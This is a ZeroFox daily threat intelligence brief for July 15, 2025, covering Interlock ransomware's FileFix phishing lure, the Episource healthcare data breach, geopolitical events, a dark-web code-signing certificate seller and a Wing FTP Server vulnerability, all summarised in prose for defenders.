ZeroFox Daily Intelligence Brief - July 15, 2025

ZeroFox Daily Intelligence Brief - July 15, 2025

ZeroFox Intelligence collects, curates, and analyzes information derived from open and proprietary sources. Here is today’s daily roundup to give you and your clients an advantage over the adversary.

Brief Highlights

• Interlock Attacks Deploy RAT Using FileFix
• U.S. Healthcare Company Episource Informs Millions of Data Breach
• Geopolitical Focus: New York Drone Attack Warning, Russia Sanctions Threat, and More

Interlock Attacks Deploy RAT Using FileFix

Source: https://www.bleepingcomputer.com/news/security/interlock-ransomware-adopts-filefix-method-to-deliver-malware/
What we know: Threat actors are using a stealthy phishing technique called “FileFix” in Interlock ransomware attacks to trick users into pasting disguised PowerShell commands into File Explorer.

Context: Victims are tricked into downloading a PHP-based remote access trojan (RAT), which gathers and exfiltrates system data. Once active, the RAT performs system reconnaissance, maintains persistence via registry changes, and enables threat actors lateral movement using remote desktop protocol.

Analyst note: Interlock ransomware actors are likely exploiting the FileFix technique to effectively bypass victim’s endpoint defenses, enabling them to conduct malicious activities, such as network mapping, privilege escalation, and lateral movement, to ultimately facilitate more targeted and damaging ransomware deployments.

U.S. Healthcare Company Episource Informs Millions of Data Breach

Source: https://techcrunch.com/2025/07/14/episource-is-notifying-millions-of-people-that-their-health-data-was-stolen/

What we know: U.S.-based healthcare billing company Episource is informing millions of its patients and other members of a data breach following a cyberattack in January and February 2025. The breach has affected over 5.4 million people across the United States.

Context: The stolen information contains personally identifiable information (PII), medical record data—including test results—and health insurance information. The incident was reportedly a ransomware attack, though Episource has not disclosed the nature of the attack.

Analyst note: Threat actors are likely to demand ransom from multiple healthcare organizations working with Episource to not post the stolen data publicly. Exposed individuals and organizations are likely to be targeted in financially-motivated blackmailing, phishing, social engineering, and impersonation attacks.

Geopolitical Focus: New York Drone Attack Warning, Russia Sanctions Threat, and More

• New York Governor Kathy Hochul has warned of drone attacks during future high-profile events like the FIFA World Cup and the U.S. 250th anniversary celebrations, seeking a boost in federal defenses.
• U.S. President Donald Trump has announced a new weapons deal with Ukraine, while warning of secondary sanctions against Russia threatening to hit its oil exports to buyers like India and China, if Moscow does not reach a peace deal in 50 days.
• Excessive rainfall and flash flood warning has been issued for central Texas, New York City, and New Jersey. Florida remains on flood watch. Rescue efforts in central Texas have been hindered due to weekend rainfall, while the statewide death toll remains at 132.
• Israel said that it carried out military strikes against tanks in southern Syria to protect the Druze that is perceived as a loyal minority to the country. Syrian government forces and Bedouin tribes have been clashing with Druze militias in the latest escalation of sectarian conflict in the country.
• India has ordered airlines to check fuel control switches in Boeing airplanes after their suspected involvement in the Air India crash that killed 260 people in June 2025. A preliminary report into the crash found that fuel was cut off to engines moments after take-off.

DEEP AND DARK WEB INTELLIGENCE

Exploit user Escobar: Untested threat actor "Escobar" has been advertising extended validation (EV) code signing certificates, claiming they are registered to legitimate Russian companies over three years old. If the claims are true, attackers could proliferate malicious payloads that are less likely to be flagged since the certificates are tied to real companies, making them effective for sophisticated phishing and other social engineering attacks.

VULNERABILITY AND EXPLOIT INTELLIGENCE

CVE-2025-47812: This remote code execution vulnerability in Wing FTP Server enables threat actors to conduct arbitrary Lua code injection, leading to server compromises. It is likely that threat actors could exploit vulnerable servers to steal data, deploy malware, and move laterally within networks. CISA has added this vulnerability to its Know Exploited Vulnerability (KEV) catalogue.

Affected products: Wing FTP Server before version 7.4.4